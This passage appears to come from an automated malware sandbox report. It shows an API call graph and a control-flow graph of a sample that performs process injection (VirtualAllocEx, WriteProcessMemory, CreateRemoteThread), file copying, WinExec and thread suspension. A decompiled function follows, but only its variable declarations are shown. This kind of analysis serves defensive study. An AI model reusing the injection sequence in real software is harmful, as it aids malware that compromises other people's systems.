FreeLibrary 21570->21571 21571->21558 21571->21568 21579 2175616 21572->21579 21573 21748f4 11 API calls 21573->21579 21574 2175060 3 API calls 21574->21579 21575 21755e4 11 API calls 21575->21579 21576 2175702 21576->20911 21577 2175718 16 API calls 21577->21579 21578 21755fc 16 API calls 21578->21579 21579->21573 21579->21574 21579->21575 21579->21576 21579->21577 21579->21578 21580 2175a4c 13 API calls 21579->21580 21580->21579 21778 2185ad8 VirtualAllocEx WriteProcessMemory 21581->21778 21583 2185b24 21779 2185ad8 VirtualAllocEx WriteProcessMemory 21583->21779 21585 2185b3b CreateRemoteThread 21586 2185b83 NtProtectVirtualMemory 21585->21586 21587 2185b65 WaitForSingleObject ReadProcessMemory 21585->21587 21586->20912 21587->21586 21589 21753aa 21588->21589 21590 21753e4 13 API calls 21589->21590 21591 21753c3 21589->21591 21590->21589 21591->20919 21593 2174d68 LoadLibraryA 21592->21593 21593->21388 21626 2175878 21594->21626 21598 2185f74 21597->21598 21598->21598 21599 2185fa3 InetIsOffline 21598->21599 21600 2185fbb 21599->21600 21601 2185fad 21599->21601 21603 21748f4 11 API calls 21600->21603 21602 21748f4 11 API calls 21601->21602 21604 2185fb9 21602->21604 21603->21604 21605 2174c24 11 API calls 21604->21605 21606 2185fe0 21605->21606 21607 2174bb0 11 API calls 21606->21607 21608 2186005 21607->21608 21609 2183690 18 API calls 21608->21609 21610 2186020 21609->21610 21611 2174c24 11 API calls 21610->21611 21612 2186039 21611->21612 21613 2174bb0 11 API calls 21612->21613 21614 218605e 21613->21614 21615 2183690 18 API calls 21614->21615 21625 2186079 21615->21625 21616 218630e 21617 21748c4 11 API calls 21616->21617 21618 2186328 21617->21618 21618->21545 21620 2185cd8 26 API calls 21620->21625 21621 2183690 18 API calls 21621->21625 21622 2174c24 11 API calls 21622->21625 21623 2174bb0 11 API calls 21623->21625 21625->21616 21625->21620 21625->21621 21625->21622 21625->21623 21720 2185958 21625->21720 21730 2185bc0 21625->21730 21627 2175897 21626->21627 21631 21758b1 21626->21631 21628 21758a2 21627->21628 21629 2172d1c 11 API calls 21627->21629 21643 2175870 21628->21643 21629->21628 21632 21758fa 21631->21632 21633 2172d1c 11 API calls 21631->21633 21634 2175907 21632->21634 21635 217593c 21632->21635 21633->21632 21637 2172c74 11 API calls 21634->21637 21636 2172c40 11 API calls 21635->21636 21638 2175946 21636->21638 21640 2175937 21637->21640 21638->21640 21646 2175858 21638->21646 21639 21758ac 21639->21520 21639->21522 21640->21639 21642 2175878 16 API calls 21640->21642 21642->21640 21649 2175a10 21643->21649 21692 2175718 21646->21692 21648 2175863 21648->21640 21650 2175875 21649->21650 21652 2175a16 21649->21652 21650->21639 21651 2175a40 21653 2172c5c 11 API calls 21651->21653 21652->21650 21652->21651 21655 21753e4 21652->21655 21653->21650 21656 21753ed 21655->21656 21676 2175422 21655->21676 21657 2175427 21656->21657 21658 2175402 21656->21658 21659 217542e 21657->21659 21660 2175438 21657->21660 21661 2175406 21658->21661 21662 2175444 21658->21662 21663 21748a0 11 API calls 21659->21663 21664 21748c4 11 API calls 21660->21664 21667 217545b 21661->21667 21668 217540a 21661->21668 21665 2175452 21662->21665 21666 217544b 21662->21666 21663->21676 21664->21676 21683 217503c 21665->21683 21680 2175024 21666->21680 21667->21676 21687 21753cc 21667->21687 21672 217540e 21668->21672 21673 217546a 21668->21673 21674 2175488 21672->21674 21679 2175412 21672->21679 21675 21753e4 13 API calls 21673->21675 21673->21676 21674->21676 21677 2175398 13 API calls 21674->21677 21675->21673 21676->21651 21677->21674 21678 2175a10 13 API calls 21678->21679 21679->21676 21679->21678 21681 217502a SysFreeString 21680->21681 21682 2175038 21680->21682 21681->21682 21682->21676 21684 2175042 21683->21684 21685 2175048 SysFreeString 21684->21685 21686 217505a 21684->21686 21685->21684 21686->21676 21688 21753d5 21687->21688 21689 21753dc 21687->21689 21688->21667 21690 2172d1c 11 API calls 21689->21690 21691 21753e3 21690->21691 21691->21667 21693 2175753 21692->21693 21694 217572d 21692->21694 21697 21748f4 11 API calls 21693->21697 21707 2175770 21693->21707 21695 2175775 21694->21695 21696 2175732 21694->21696 21698 2175060 3 API calls 21695->21698 21695->21707 21699 2175737 21696->21699 21700 2175789 21696->21700 21697->21693 21698->21695 21702 217579d 21699->21702 21703 217573c 21699->21703 21700->21707 21711 21755e4 21700->21711 21702->21707 21708 2175718 16 API calls 21702->21708 21704 2175741 21703->21704 21705 21757be 21703->21705 21704->21693 21704->21707 21709 21757ef 21704->21709 21706 21755fc 16 API calls 21705->21706 21705->21707 21706->21705 21707->21648 21708->21702 21709->21707 21716 2175a4c 21709->21716 21712 21755f4 21711->21712 21713 21755ed 21711->21713 21714 2172d1c 11 API calls 21712->21714 21713->21700 21715 21755fb 21714->21715 21715->21700 21718 2175a53 21716->21718 21717 2175a6d 21717->21709 21718->21717 21719 2175a10 13 API calls 21718->21719 21719->21717 21721 2185967 21720->21721 21742 2175524 21721->21742 21723 218598e 21724 21859f0 21723->21724 21729 21859d4 lstrcmpiA 21723->21729 21725 21748a0 11 API calls 21724->21725 21726 2185a05 21725->21726 21727 21753e4 13 API calls 21726->21727 21728 2185a17 21727->21728 21728->21625 21729->21723 21768 2174d54 21730->21768 21733 2185c1f 21770 2185a40 21733->21770 21736 2185b0c 5 API calls 21737 2185c42 21736->21737 21738 2185c5d 21737->21738 21739 2185c50 CloseHandle 21737->21739 21740 21748a0 11 API calls 21738->21740 21739->21738 21741 2185c72 21740->21741 21741->21625 21743 217552f 21742->21743 21746 2175550 21742->21746 21744 2175544 21743->21744 21745 2175571 21743->21745 21743->21746 21748 2175580 21744->21748 21749 2175548 21744->21749 21745->21746 21755 21752b4 21745->21755 21746->21723 21748->21746 21759 217550c 21748->21759 21751 217554c 21749->21751 21754 217558f 21749->21754 21751->21746 21764 21754dc 21751->21764 21752 2175524 12 API calls 21752->21754 21754->21746 21754->21752 21756 21752d0 21755->21756 21757 21752ba SysAllocStringLen 21755->21757 21756->21745 21757->21756 21758 2174ff4 21757->21758 21758->21755 21760 217551c 21759->21760 21762 2175515 21759->21762 21761 2172d1c 11 API calls 21760->21761 21763 2175523 21761->21763 21762->21748 21763->21748 21765 21754ee 21764->21765 21766 2175524 12 API calls 21765->21766 21767 2175507 21765->21767 21766->21765 21767->21751 21769 2174d58 GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 21768->21769 21769->21733 21771 2185a68 21770->21771 21772 2185a74 VirtualAllocEx 21771->21772 21773 2185a91 21772->21773 21774 2185a9d WriteProcessMemory 21773->21774 21775 2185ab8 21774->21775 21776 21748c4 11 API calls 21775->21776 21777 2185ac5 21776->21777 21777->21736 21778->21583 21779->21585 21781 2172edb 21780->21781 21782 2172ed3 CharNextA 21781->21782 21787 2172ef5 21781->21787 21782->21781 21783 2172f49 21786 2174f90 11 API calls 21783->21786 21784 2172f34 CharNextA 21784->21787 21785 2172f01 CharNextA 21785->21787 21788 2172f52 21786->21788 21787->21783 21787->21784 21787->21785 21789 2172f0b CharNextA 21787->21789 21790 2172f2a CharNextA 21787->21790 21791 2172fba 21788->21791 21792 2172f60 CharNextA 21788->21792 21793 2172f9c CharNextA 21788->21793 21794 2172f6a CharNextA 21788->21794 21795 2172f92 CharNextA 21788->21795 21789->21787 21790->21787 21791->21001 21792->21788 21793->21788 21794->21788 21795->21788 21797 2172c40 11 API calls 21796->21797 21798 21838d6 21797->21798 21798->21053 21801 217493c 21799->21801 21800 2174960 21800->21137 21801->21800 21802 2172c5c 11 API calls 21801->21802 21802->21800 21809 218478b 21803->21809 21804 2184875 21805 21748c4 11 API calls 21804->21805 21806 218488f 21805->21806 21806->21243 21808 21847cb LoadLibraryA 21808->21809 21809->21804 21809->21808 21811 218482e GetProcAddress 21809->21811 21812 2184840 GetProcAddress 21809->21812 21813 21845d4 21809->21813 21823 2184544 21809->21823 21811->21809 21812->21809 21814 21845e3 21813->21814 21815 2175524 12 API calls 21814->21815 21819 2184607 21815->21819 21816 218465a 21817 21748a0 11 API calls 21816->21817 21818 218466f 21817->21818 21820 21753e4 13 API calls 21818->21820 21819->21816 21822 2184640 lstrcmpiA 21819->21822 21821 2184681 21820->21821 21821->21809 21822->21819 21824 2184558 21823->21824 21825 2175a04 16 API calls 21824->21825 21826 218458b 21825->21826 21827 21748f4 11 API calls 21826->21827 21828 21845a5 21827->21828 21829 21748a0 11 API calls 21828->21829 21830 21845ba 21829->21830 21831 2175a10 13 API calls 21830->21831 21832 21845c8 21831->21832 21832->21809

                                                                                                Executed Functions

                                                                                                Function 02189128 Relevance: 124.7, APIs: 12, Strings: 57, Instructions: 3930fileCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 0 2189128-218912b 1 2189130-2189135 0->1 1->1 2 2189137-2189163 call 2173024 call 217304c InetIsOffline 1->2 7 2189165-2189174 call 21748f4 2->7 8 2189176-2189188 call 217304c InetIsOffline 2->8 13 21891aa-2189495 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2183658 call 2174d64 call 2174a98 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174bb0 call 21780f8 7->13 14 218918a-2189199 call 21748f4 8->14 15 218919b-21891a5 call 21748f4 8->15 127 2189513-2189596 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 21748f4 13->127 128 2189497-21894f9 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 13->128 14->13 15->13 160 218959b-21896bd call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 217c510 call 21748f4 127->160 155 21894fe-218950e call 21748f4 128->155 155->160 193 21896bf-21896c2 160->193 194 21896c4-218977a call 2174dc4 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174d64 call 2174a98 call 21780f8 160->194 193->194 217 218997f-2189b59 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2177d88 call 2172fc4 call 2173300 call 21736bc call 2172d28 call 21734cc call 2172d28 call 2174f90 194->217 218 2189780-2189945 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2173300 call 21736bc call 2172d28 call 21734cc call 2172d28 call 2174f90 194->218 337 2189b5b-2189b5e 217->337 338 2189b60-2189de6 call 2174dbc call 2173454 call 2172d28 call 2173474 call 2172d28 call 218860c call 2175a4c call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 21748f4 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2177d88 call 2188e78 call 21748f4 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2188bbc 217->338 327 218994c-218997a call 2174dbc call 2173454 call 2172d28 call 2173474 call 2172d28 218->327 328 2189947-218994a 218->328 351 218a043-218a2bd call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 21748f4 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2188bf8 327->351 328->327 337->338 500 2189dec-2189f4c call 2188cbc call 21748f4 call 2174a98 * 2 call 2183690 call 2174a98 * 2 call 2183690 call 2174a98 * 2 call 2183690 call 2174a98 * 2 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 338->500 501 2189f51-218a03e call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 338->501 502 218e61c 351->502 503 218a2c3-218a7e9 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2177d88 call 2188f20 call 21748f4 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2188c58 call 21748f4 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174b28 call 218860c call 2175a4c call 21748f4 * 11 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 21748f4 call 2174d64 call 2174a98 call 217811c 351->503 500->501 501->351 730 218a7eb-218a808 call 2174d64 call 2174a98 call 21782b0 503->730 731 218a80d-218a820 503->731 730->731 733 218a822-218a825 731->733 734 218a827-218aa33 call 2174dc4 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174cb0 731->734 733->734 799 218aa39-218aa94 call 2188e04 call 2174c24 call 2174d64 call 2174a98 call 21780f8 734->799 800 218b902-218bec7 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 218888c call 21748f4 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2177d88 call 2188e78 call 21748f4 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2188e04 call 2188c58 call 21748f4 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174cb0 734->800 799->800 822 218aa9a-218aea8 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 21780f8 799->822 1186 218cdeb-218ceec call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174cb0 800->1186 1187 218becd-218bf12 call 2174c24 call 2174d64 call 2174a98 call 21780f8 800->1187 1064 218aeae-218b03b call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174d64 call 2174a98 call 21889a4 822->1064 1065 218b040-218b7e5 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174d64 call 2172fc4 call 2174d64 CopyFileA call 2174a98 * 2 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2188718 call 21748f4 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2173c30 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 217304c call 2177c4c call 2174bb0 call 217304c call 2177c4c call 2174bb0 call 2188e04 call 2174c24 call 2174d64 call 2174a98 call 2181c14 822->1065 1064->1065 1830 218b7e8-218b7ff call 2173c60 1065->1830 1288 218d6fa-218d7fb call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174cb0 1186->1288 1289 218cef2-218cf01 call 2174cb0 1186->1289 1187->1186 1221 218bf18-218bf35 call 2174a98 call 217811c 1187->1221 1221->1186 1235 218bf3b-218c0d1 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2173c30 call 217304c call 2177c4c call 2174c24 call 2174d64 call 2174a98 call 2173c60 1221->1235 1409 218d8ef-218d9f0 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174cb0 1288->1409 1410 218d801-218d810 call 2174cb0 1288->1410 1289->1288 1301 218cf07-218cf16 call 2174cb0 1289->1301 1301->1288 1311 218cf1c-218d4dd call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174bb0 call 2174d64 WinExec Sleep call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174d64 call 2174a98 call 21857d0 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 OpenProcess call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 NtSuspendThread call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 217304c InetIsOffline 1301->1311 1875 218d4df-218d4ee call 21748f4 1311->1875 1876 218d4f0-218d563 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 1311->1876 1534 218dacd-218df6e call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174a98 * 2 call 2183690 call 2174a98 * 2 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174a98 * 2 call 2183690 call 2174a98 * 2 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 217304c 1409->1534 1535 218d9f6-218da05 call 2174cb0 1409->1535 1410->1409 1421 218d816-218d825 call 2174cb0 1410->1421 1421->1409 1435 218d82b-218d83d call 217304c InetIsOffline 1421->1435 1444 218d83f-218d84e call 21748f4 1435->1444 1445 218d850-218d8c3 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 1435->1445 1460 218d8c9-218d8ea call 2172fc4 call 2174dbc call 2183990 1444->1460 1445->1460 1507 218d8c4 call 2183690 1445->1507 1460->1409 1507->1460 1944 218df70-218df7f call 21748f4 1534->1944 1945 218df81-218df86 1534->1945 1535->1534 1547 218da0b-218da1a call 2174cb0 1535->1547 1547->1534 1558 218da20-218da32 call 217304c InetIsOffline 1547->1558 1570 218da34-218da43 call 21748f4 1558->1570 1571 218da45-218dab8 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 1558->1571 1586 218dabe-218dac8 call 2174dbc call 21848a0 1570->1586 1571->1586 1631 218dab9 call 2183690 1571->1631 1586->1534 1631->1586 1885 218d569-218d6f5 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174dbc call 218779c call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 ZwClose call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 1875->1885 1876->1885 1915 218d564 call 2183690 1876->1915 1885->1288 1915->1885 1949 218df90-218e037 call 2174a98 * 2 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 1944->1949 1945->1949 1950 218df8b call 21748f4 1945->1950 1990 218e03c-218e13d call 2174a98 * 2 call 2183690 call 2174a98 * 2 call 2183690 call 2174a98 * 2 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 1949->1990 1950->1949 2020 218e142-218e149 call 2183690 1990->2020 2022 218e14e-218e46e call 2174a98 call 2174d64 call 2174a98 call 2183690 call 2174a98 call 2174d64 call 2174a98 call 2183690 call 2174a98 call 2174d64 call 2174a98 call 2183690 call 2174a98 call 2174d64 call 2174a98 call 2183690 call 2174a98 call 2174d64 call 2174a98 call 2183690 call 2174a98 call 2174d64 call 2174a98 call 2183690 call 2174a98 call 2174d64 call 2174a98 call 2183690 call 2174a98 call 2174d64 call 2174a98 call 2183690 call 2174a98 call 2174d64 call 2174a98 call 2183690 call 2174a98 call 2174d64 call 2174a98 call 2183690 call 2174a98 call 2174d64 call 2174a98 call 2183690 call 2174a98 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 2020->2022 2130 218e473-218e47a call 2183690 2022->2130 2132 218e47f-218e610 call 2174a98 call 2174d64 call 2174a98 call 2183690 call 2174a98 call 2174d64 call 2174a98 call 2183690 call 2174a98 call 2174d64 call 2174a98 call 2183690 call 2174a98 call 2174d64 call 2174a98 call 2183690 call 2174a98 call 2174d64 call 2174a98 call 2183690 call 2174a98 call 2174d64 call 2174a98 call 2183690 call 2174a98 call 2174d64 call 2174a98 call 2183690 2130->2132 2188 218e615-218e617 ExitProcess 2132->2188
                                                                                                C-Code - Quality: 53%
                                                                                                			E02189128(void* __ebx, void* __edi, void* __esi, void* __fp0) {
				char _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				char _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				char _v40;
				intOrPtr _v44;
				char _v48;
				char _v52;
				char _v56;
				intOrPtr _v60;
				char _v64;
				char _v68;
				char _v72;
				intOrPtr _v76;
				char _v80;
				char _v84;
				char _v88;
				intOrPtr _v92;
				char _v96;
				char _v100;
				char _v104;
				intOrPtr _v108;
				char _v112;
				char _v116;
				char _v120;
				char _v124;
				intOrPtr _v128;
				char _v132;
				char _v136;
				char _v140;
				intOrPtr _v144;
				char _v148;
				char _v152;
				char _v156;
				intOrPtr _v160;
				char _v164;
				char _v168;
				char _v172;
				intOrPtr _v176;
				char _v180;
				char _v184;
				char _v188;
				intOrPtr* _v192;
				char _v196;
				intOrPtr _v200;
				char _v204;
				char _v208;
				char _v212;
				char _v216;
				intOrPtr _v220;
				char _v224;
				char _v228;
				char _v232;
				intOrPtr _v236;
				char _v240;
				char _v244;
				char _v248;
				intOrPtr _v252;
				char _v256;
				char _v260;
				char _v264;
				intOrPtr _v268;
				char _v272;
				char _v276;
				char _v280;
				intOrPtr _v284;
				char _v288;
				char _v292;
				char _v296;
				intOrPtr _v300;
				char _v304;
				char _v308;
				char _v312;
				char _v316;
				char _v320;
				intOrPtr _v324;
				char _v328;
				char _v332;
				char _v336;
				intOrPtr _v340;
				char _v344;
				char _v348;
				char _v352;
				char _v356;
				intOrPtr _v360;
				char _v364;
				char _v368;
				char _v372;
				intOrPtr _v376;
				char _v380;
				char _v384;
				char _v388;
				char _v392;
				char _v396;
				char _v400;
				char _v404;
				char _v408;
				char _v412;
				char _v416;
				char _v420;
				char _v424;
				intOrPtr _v428;
				char _v432;
				char _v436;
				char _v440;
				intOrPtr _v444;
				char _v448;
				char _v452;
				char _v456;
				intOrPtr _v460;
				char _v464;
				char _v468;
				char _v472;
				intOrPtr _v476;
				char _v480;
				char _v484;
				char _v488;
				intOrPtr _v492;
				char _v496;
				char _v500;
				char _v504;
				intOrPtr _v508;
				char _v512;
				char _v516;
				char _v520;
				intOrPtr _v524;
				char _v528;
				char _v532;
				char _v536;
				intOrPtr _v540;
				char _v544;
				char _v548;
				char _v552;
				intOrPtr _v556;
				char _v560;
				char _v564;
				char _v568;
				char _v572;
				intOrPtr _v576;
				char _v580;
				char _v584;
				char _v588;
				char _v592;
				intOrPtr _v596;
				char _v600;
				char _v604;
				char _v608;
				char _v612;
				char _v616;
				intOrPtr _v620;
				char _v624;
				char _v628;
				char _v632;
				intOrPtr _v636;
				char _v640;
				char _v644;
				char _v648;
				intOrPtr _v652;
				char _v656;
				char _v660;
				char _v664;
				intOrPtr _v668;
				char _v672;
				char _v676;
				char _v680;
				intOrPtr _v684;
				char _v688;
				char _v692;
				char _v696;
				char _v700;
				char _v704;
				intOrPtr _v708;
				char _v712;
				char _v716;
				char _v720;
				intOrPtr _v724;
				char _v728;
				char _v732;
				char _v736;
				intOrPtr _v740;
				char _v744;
				char _v748;
				char _v752;
				intOrPtr _v756;
				char _v760;
				char _v764;
				char _v768;
				intOrPtr _v772;
				char _v776;
				char _v780;
				intOrPtr _v784;
				char _v788;
				char _v792;
				char _v796;
				intOrPtr _v800;
				char _v804;
				char _v808;
				char _v812;
				intOrPtr _v816;
				char _v820;
				char _v824;
				char _v828;
				intOrPtr _v832;
				char _v836;
				char _v840;
				intOrPtr _v844;
				char _v848;
				intOrPtr _v852;
				char _v856;
				char _v860;
